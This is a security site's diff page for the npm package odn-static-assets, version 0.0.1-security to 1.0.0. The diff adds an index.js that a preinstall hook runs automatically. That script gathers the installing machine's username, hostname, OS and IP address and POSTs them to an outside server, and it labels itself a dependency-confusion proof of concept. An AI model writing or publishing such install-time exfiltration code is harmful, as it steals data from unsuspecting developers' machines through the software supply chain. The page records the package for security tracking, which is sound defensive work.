npm - odn-static-assets - Versions diffs - 0.0.1-security → 1.0.0 - Mend

odn-static-assets 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of odn-static-assets might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,80 @@
+const os = require('os');
+const https = require('https');
+// Function to print a message in bold
+function printBold(message) {
+    console.log(`${message}\n`);
+}
+// Function to print machine information in a table
+function printMachineInfoTable(info) {
+    console.log("Machine Information:");
+    console.table(info);
+}
+// Prepare machine information
+const machineInfo = {
+    "Operating System": `${os.platform()} ${os.release()}`,
+    "System Architecture": os.arch(),
+    "User": os.userInfo().username,
+    "Hostname": os.hostname(),
+    "IP Address": getIPAddress(),
+};
+// Display welcome message
+printBold("Hello!\nI am \x1b[1mRedYetiDev\x1b[0m.\n");
+// Display exploit message
+printBold(`If you see this message, then your system may be vulnerable to a \x1b[1mDependency Confusion Exploit\x1b[0m.\n
+A dependency confusion exploit occurs when an attacker tricks a system into loading malicious code by providing a package with the same name as a legitimate dependency. This can lead to security vulnerabilities, data breaches, and unauthorized access.\n`);
+// Display machine information in a table
+printMachineInfoTable(machineInfo);
+// Send a POST request to the server
+const postData = JSON.stringify(machineInfo);
+const options = {
+    hostname: 'redyetihacks.pythonanywhere.com',
+    port: 443,
+    path: '/machine_info',
+    method: 'POST',
+    headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': postData.length,
+    }
+};
+const req = https.request(options, (res) => {
+    let data = '';
+    res.on('data', (chunk) => {
+        data += chunk;
+    });
+    res.on('end', () => {
+        console.log("POST Request Response:", data);
+    });
+});
+req.on('error', (error) => {
+    console.error("Error sending POST request:", error);
+});
+req.write(postData);
+req.end();
+// Function to get the IP address
+function getIPAddress() {
+    const networkInterfaces = os.networkInterfaces();
+    for (const key in networkInterfaces) {
+        const interface = networkInterfaces[key];
+        for (let i = 0; i < interface.length; i++) {
+            const { address, family, internal } = interface[i];
+            if (family === 'IPv4' && !internal) {
+                return address;
+            }
+        }
+    }
+    return 'N/A';
+}

package/package.json CHANGED Viewed

@@ -1,6 +1,11 @@
 {
   "name": "odn-static-assets",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "This package is being used as a PoC in a Bug Bounty Program",
+  "main": "index.js",
+  "scripts": {
+     "preinstall":"./index.js"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=odn-static-assets for more information.